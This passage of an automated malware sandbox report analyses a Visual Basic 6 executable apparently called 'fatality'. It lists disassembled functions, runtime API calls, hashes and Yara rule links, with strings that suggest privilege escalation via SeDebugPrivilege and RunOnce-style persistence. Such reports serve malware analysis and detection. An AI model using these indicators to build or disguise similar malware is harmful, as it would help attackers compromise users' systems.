                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                            • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                            • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                            • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                            • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$#712Move$CopyFree
                                                                                                                                                            • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                            • API String ID: 2546659950-1311169778
                                                                                                                                                            • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                                                                            • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4
                                                                                                                                                            Function 00418B50 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 81COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID: (%@
                                                                                                                                                            • API String ID: 3031735744-1462787901
                                                                                                                                                            • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                            • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                            Function 0040FDD0 Relevance: 27.1, APIs: 18, Instructions: 122COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                            • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 43011225-0
                                                                                                                                                            • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                            • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                            Function 00410FB0 Relevance: 27.1, APIs: 18, Instructions: 106COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 669208520-0
                                                                                                                                                            • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                            • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                            Function 00418F30 Relevance: 25.7, APIs: 17, Instructions: 169COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00418FE9
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419003
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,-00000001), ref: 0041907B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 004190A4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004190D1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004190E1
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 0041913F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                            • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                            Function 0040ACA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 97COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                            • String ID: RO$Once
                                                                                                                                                            • API String ID: 3210543181-275216174
                                                                                                                                                            • Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
                                                                                                                                                            • Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9
                                                                                                                                                            Function 00410C70 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 00410CBE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                            • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                            • API String ID: 1749655604-2896544425
                                                                                                                                                            • Opcode ID: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                            • Instruction ID: 19430b606137baf8db46125749817fb036df22dc0e74aca3634fbbd968d53a81
                                                                                                                                                            • Opcode Fuzzy Hash: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                            • Instruction Fuzzy Hash: E3512EB1900308DBDB14DFA1DA09BEEB7B8BB04704F20812EE105BB191D7B85A89DF55
                                                                                                                                                            Function 00418A10 Relevance: 22.6, APIs: 15, Instructions: 76COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3031735744-0
                                                                                                                                                            • Opcode ID: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                            • Instruction ID: 31f6dc709dd63b5e7e6354cc984dc1dfaca077b65c72c4c2232904d0b2341183
                                                                                                                                                            • Opcode Fuzzy Hash: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                            • Instruction Fuzzy Hash: A031FCB5800209EBCB04DFE4DE58ADE7B78FB48315F108559F211B72A0DB756A44CB68
                                                                                                                                                            Function 0040FF70 Relevance: 21.1, APIs: 14, Instructions: 80COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEBD8B1,6CEAA323,00000000), ref: 0040FFAA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                            • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3249593964-0
                                                                                                                                                            • Opcode ID: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                            • Instruction ID: 3391faed527fa42239c90739200fcb3ec4dff878199542e7df0cbe2f1190cda9
                                                                                                                                                            • Opcode Fuzzy Hash: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                            • Instruction Fuzzy Hash: EC212F71D00109ABCB04DFA5DD89AEFBB78FF59700F10812AE516B72A0DB785945CB98
                                                                                                                                                            Function 00419700 Relevance: 19.6, APIs: 13, Instructions: 120COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,6CEBD8B1,00000000,6CEB2523), ref: 0041975B
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419775
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004197F9
